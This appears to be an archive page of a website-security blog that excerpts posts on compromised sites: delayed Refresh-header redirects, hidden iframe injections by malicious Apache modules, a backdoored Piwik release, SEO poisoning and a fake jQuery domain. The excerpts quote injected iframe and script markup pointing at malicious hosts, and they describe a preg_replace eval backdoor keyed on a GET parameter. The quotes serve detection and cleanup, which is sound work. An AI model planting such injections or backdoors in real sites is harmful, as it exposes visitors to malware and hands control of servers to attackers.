Compromised Websites Hosting Calls to Java Exploit

Malware Redirection with a Delay

February 13, 2013 by Daniel Cid 1 Comment

You visit a site and it looks good and clean. However, if you keep the page open, after maybe 20-30 seconds, you get redirected to a casino or pharma affiliate page. What is going on?

We call these delayed redirections and they are becoming more prevalent these days. Instead of injecting malware, or performing redirections via javascript, the attackers are adding the refresh option to the HTTP headers. Similar to the following:

HTTP/1.1 200 OK
Date: Tue, 29 Jan 2013 17:18:02 GMT
Server: Apache
Refresh: 25; url="httx://www.dodonet.biz"

Read More

Filed Under: hacked, Malware, malware_updates Tagged With: hacked, Malware, malware_updates

Server Compromises – Understanding Apache Module iFrame Injections and Secure Shell Backdoor

January 23, 2013 by Daniel Cid 11 Comments

There are many ways to inject a malicious payload onto a website. The attacker can modify any of the web files (index.php for example), the .htaccess file or php.ini (if the site is using PHP). There are other ways, but those are the most common methods, specially on shared hosts.

However, for the last year, we started to see a new way to inject malware on compromised servers via a malicious Apache module. We posted about it before and it has been covered on many other mediums. After a few months of tracking them, and working on multiple servers that had this issue, we want to share a bit of what we have learned.

Identifying the injection

First, a good way to identify if an infection is coming via the Apache module compromise is by looking at how the iframe is being inserted. They seem to always follow this pattern:

<style<.t1nhuhjv { position:absolute; left:-1619px; top:-1270px} </style> <div class=”t1nhuhjv”><iframe
src="httx://qotive. changeip.name/random/" width=”534″ height=”556″> </iframe></div>

or

<style>.q6umct6stl { position:absolute; left:-1284px; top:-1774px} </style> <div class="q6umct6stl”><iframe
src="httx://nujifa. longmusic.com/kdqjagzxwbakl/cdce48ffcf125f41206a9ed88675b56b/" width="367" height="411"></iframe></div>

The domain name changes very often (IP is often 62.75.235.48), as does the div class name and the iframe sizes. These are some of the domains we have tracked:

Read More

Filed Under: Audit, backdoors, hacked, Malware, malware_updates Tagged With: backdoors, hacked, Malware, malware_updates

Website Malware – Reality of Cross-Site Contaminations

December 13, 2012 by Tony Perez 4 Comments

Sometimes you can’t help but put yourself in the shoes of your clients and skeptics and wonder how many times they roll their eyes at the things you says. Cross-site contamination is one of those things.

We first start writing about it in March of 2013 in a little post that got a lot of attention, “A Little Tale About Website Cross Contamination”. In that case we talked to how the attack vector was coming from a neighboring site that had since been neglected, in turn it was now housing the generating payload that was affecting the live sites. All in all, it was a sad and depressing story.

In this case, it’s unique in that it’d fall into what we would categorize a targeted attack. That’s right, the complete opposite of what we often tell most readers they fall into, opportunistic attacks. I will caveat that it’s not known for sure, but after reading this we’ll let you be the judge.

/* It’s nothing personal, it’s just business */

Read More

Filed Under: hacked, Malware, research, Spam, sucuri Tagged With: hacked, Malware, research, security, sucuri

Piwik.org webserver hacked and backdoor added to Piwik

November 27, 2012 by Daniel Cid 1 Comment

If you are using Piwik and you have downloaded/updated it recently, please double check your install to verify that it does not contain a backdoor. From piwik.org:

Important Security Announcement: Piwik.org webserver got compromised by an attacker on 2012 Nov 26th, this attacker added a malicious code in the Piwik 1.9.2 Zip file for a few hours.

How do I know if my Piwik server is safe?

You would be at risk only if you installed or updated to Piwik 1.9.2 on Nov 26th from 15:43 UTC to 23:59 UTC.
If you are not using 1.9.2, or if you have updated to 1.9.2 earlier than Nov 26th 15:40 UTC or from Nov 27th, you should be safe.

The attackers also added a backdoor at the end of the file Loader.php allowing them to execute any command using preg_replace("/(.+)/e" (code eval) and $_GET['g']. You can search on your logs for “g=” and see if it was used by any attacker.

In their report they say it was compromised through a vulnerability on a WordPress Plugin, but didn’t provide any details on which one caused it. We will post more details if we learn more about it.

Filed Under: hacked, piwik Tagged With: hacked, piwik

Website Malware – SEO Poisoning

November 20, 2012 by Tony Perez 5 Comments

We’ve been seeing a lot of cases of SEO poisoning as of late and felt it was time to spend a little more time explaining it. That’s what this post will be about.

SEO, short for Search Engine Optimization is all the rave these days. Anybody that owns a website and is trying to make an impact or working to improve their traffic has heard the term, and has undoubtedly become an SEO expert. If you’re not familiar with SEO here is your quick definition:

…the process of affecting the visibility of a website or a web page in a search engine’s “natural” or un-paid (“organic”) search results.. – Source: Wikipedia

Many organizations will actually enlist the help of marketing consultants to assist in this optimization process and ranking on the first page is highly coveted by many. In essence, if you are able to rank on the first page for a specific keyword, phrase, subject, etc… you have the ability to generate a lot of traffic to your site. This in turn increasing the odds of visits, and if you’re an e-commerce site often equates to purchases, and if you’re a services company often equates to new clients. The idea is simple and highly effective, and what is even better is that most search engines like Bing, Yahoo and Google offer set criteria’s designed to improve your ranking within their searches.

It all sounds pretty awesome right?

Read More

Filed Under: awareness, hacked, Malware, pharma, security, Spam, sucuri Tagged With: pharma, security, seo, SEO Poisoning, sucuri

Sucuri – Decoding Obfuscated PHP

October 30, 2012 by Tony Perez 3 Comments

We are happy to release a new tool for you Do It Yourself (DIY) types. Every now and then you might come across a variety of obfuscated injections in your PHP files and might find yourself wondering,

Wonder what that does?

Not to fear, Sucuri is here and we have a cool little tool that will help you take a look up it’s skirt. If nothing else this will you developers better understand how good is used for evil.

The one very cool thing about it is that it will decode as many layers as possible until it reaches a layer it is unable to decode. In our testing we have found a few strands that have gone down 20 different layers of obfuscation before it got to a point where it needed human intervention. Here is an example of 13 layers with a final output: http://ddecode.com/phpdecoder/?results=54a91431e44ab48462d4db6a59ae3db8

You can decode your obfuscated PHP here: http://ddecode.com/phpdecoder/

Filed Under: hacked, Malware, php Tagged With: backdoors, decode, php, security, tools

Dealing with WordPress Malware

October 11, 2012 by Tony Perez 8 Comments

A few months back I contributed to a post with Smashing Magazine on the top 4 WordPress Infections, it was released yesterday, and it couldn’t have been at a better time. If any one attended WordCamp Las Vegas you might even find some similarities. Fortunately in the process of preparing for the event and working with the team, we were able to compile a bit more information expanding on the things we originally discussed in the last post. It’s perfect timing for a number of reasons, and will complement this post very nicely.

WordPress Malware
The idea of this post, like many in the past, is to outline and discuss this past weekend’s presentation. In the process, hopefully you take something away. Unfortunately, the presentation was capped off with a live attack and hack, and I won’t be able to include that in this post, but I promise it’s coming.

**Note: If you plan to be at WordCamp Philadelphia 2012 you might be in for some treats, just saying. And if you don’t have it on the calendar, you should.

Read More

Filed Under: awareness, blacklisted, google, hacked, htaccess, Learn, Malware, phishing, php, plesk, protection, Redirects, research, security, SiteCheck, Spam, sucuri, vulnerability, WordPress Tagged With: infections, Malware, security, sucuri, vulnerability, WordPress

Sorryforthiscode – iFrame Injection

September 28, 2012 by Daniel Cid 3 Comments

We were working on a compromised site today that had some hidden iFrames on it. The iFrames were redirecting visitors to what seemed like random domains. This is the iFrame we were seeing:

<iFrame src="httx://directs016. ru/in.cgi?wal" width=1 height=1 ..

Sorryforthiscode

Nothing new, but we decided to check how popular it was, and we were able to detect a few other sites with it. After a while the iFrame being injected changed and as we continued to track it, we noticed that it was changing every few hours. Here are some of the domains used up in the last few days:

Read More

Filed Under: hacked, Malware, malware_updates Tagged With: hacked, Malware, malware_updates

Careful With Fake jQuery Website – jquery-framework. com

September 17, 2012 by Daniel Cid 13 Comments

A few days ago we posted in our Labs notes about a Fake jQuery website that is distributing malware. The domain was properly chosen to confuse the end-users ( jquery-framework.com ), since it looks like a valid site.

jquery-framework.com

This is what we were seeing injected on some websites:

<script src="httx://jquery-framework.com/jquery-1.7.1.js..

Read More

Filed Under: hacked, Malware, malware_updates, WordPress Tagged With: hacked, Malware, malware_updates, WordPress